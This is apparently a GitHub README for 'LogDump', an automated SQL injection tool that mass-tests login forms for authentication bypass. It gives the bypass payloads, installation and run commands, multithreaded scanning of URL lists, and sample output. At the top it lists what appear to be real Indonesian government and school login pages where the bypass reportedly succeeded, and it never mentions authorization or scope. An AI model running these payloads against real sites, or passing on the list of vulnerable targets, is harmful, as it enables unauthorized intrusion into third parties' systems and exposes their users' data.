LogDump is an automated SQL injection testing tool designed to test login pages for vulnerabilities. It sends injection payloads into the username and password fields to check for potential security flaws. The tool supports both single URL testing and testing multiple URLs from a file, with logging, retry mechanisms, and multi-threading for improved performance.
Login found: http://ptsp.pt-nad.go.id/aipda/page/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+
Login found: https://www.eapus.pn-sinabang.go.id/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+
Login found: https://flipbook.smpn1blimbingsari.sch.id/login.php with payload: ' OR 1=1 -- - ' or 1=1 limit 1 -- -+
https://i.postimg.cc/k4dYyBT0/logon.png
- Automated SQL Injection Testing: Test login pages with a variety of payloads to check for vulnerabilities.
- Single URL Testing: Test one URL at a time.
- Multiple URL Testing: Test multiple URLs from a file, with optional URL filtering based on keywords.
- Logging: Logs results of successful and failed injection attempts into separate log files.
- Exponential Backoff Retry: Automatically retries failed requests with an increasing delay.
- Multi-threading: Performs concurrent tests on multiple URLs and payloads for faster results.
- Customizable Fields: Allows customization of the username and password field names.
-
Clone the repository:
git clone https://github.com/HackfutSec/LogDump.git
-
Navigate to the project directory:
cd LogDump -
Install the required dependencies:
pip install -r requirements.txt
If you don't have a
requirements.txt, you can install the required libraries manually:pip install requests
To test a single login URL, run the program and provide the URL when prompted:
python logdump.pyYou will be asked to enter:
- Username field name (default:
username) - Password field name (default:
password) - URL to test
The program will attempt to bypass the login using a series of payloads and log the results.
To test multiple URLs, the program will ask for the path to a file containing the URLs you want to test.
- URLs will be filtered based on keywords you provide (optional).
- The results will be logged and saved in the
results.txtfile.
python logdump.pyWhen prompted, enter:
- File path containing URLs to test.
- Keywords to filter URLs (optional).
success_injections.log: Logs successful injection attempts.error_injections.log: Logs errors or failed attempts.test_injections.log: General logs, including retries and requests.
The results of successful logins are also saved in a text file (results.txt).
You can add custom payloads by editing the payloads.json file. This file should contain a list of payload strings, such as:
[
"' OR 1=1 --",
"' OR 'a'='a",
"' OR 1=1#"
]You can customize the program by modifying the following parameters:
- Username field name and Password field name: Set default field names for the login form (default:
username,password). - Payload file: The default payload file is
payloads.json. You can replace or modify it to suit your needs.
$ python logdump.py
Enter the URL to test (e.g., http://example.com/login.php): http://example.com/login.php
Enter the username field name (default 'username'):
Enter the password field name (default 'password'):
Testing with payload: ' OR 1=1 --
Testing with payload: ' OR 'a'='a
Login found with payload: ' OR 1=1 -- on URL http://example.com/login.php
Login found: http://example.com/login.php with payload: ' OR 1=1 --$ python logdump.py
Enter the path to the file containing the URLs to test: urls.txt
Enter the keywords to filter URLs (separated by commas): admin,login- Success logs: All successful injection attempts are logged in
success_injections.log. - Error logs: Errors, such as network issues or invalid responses, are logged in
error_injections.log. - General logs: General information, including retries, are stored in
test_injections.log.
requests: A simple HTTP library for making requests.concurrent.futures: For multi-threading to run tests concurrently.
Contributions are welcome! Feel free to fork the repository, open issues, and submit pull requests.
- Fork this repository.
- Create a new branch (
git checkout -b feature-name). - Make your changes.
- Commit your changes (
git commit -am 'Add new feature'). - Push to the branch (
git push origin feature-name). - Create a pull request.
This project is licensed under the MIT License - see the LICENSE file for details.